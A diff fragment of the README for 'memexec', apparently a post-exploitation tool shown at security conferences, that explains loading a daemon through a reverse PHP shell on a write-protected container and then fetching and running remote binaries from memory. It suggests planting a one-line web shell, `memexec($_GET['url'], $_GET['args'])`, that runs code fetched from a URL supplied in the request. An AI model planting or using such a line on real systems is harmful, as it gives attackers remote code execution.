arget13/memexec/README.md

 After a request is received it `fork()`s and the child will load and run the program received, while keeping the parent as *server*.
 It should be fairly easy to adapt to other IPC methods instead of pipes, like sockets (UNIX or network ones), or shared memory.

-`a.php` was part of the demo at RootedCon.
+`a.php` was part of the demo at DEFCON.
 In case you get an inverse php shell on a **distroless** --without write permissions anywhere-- you can paste the contents of this file in order to load the daemon.
 Then perform requests to load and run remote binaries using the function `memexec()` defined in `a.php`.

 It can be very a very interesting toy to play with, *e. g.* in web environments where you can't get a reverse interactive session you may want to add code like `memexec($_GET['url'], $_GET['args'])`, or modify it in order to read the program from a POST request, and show the output of its execution as web content.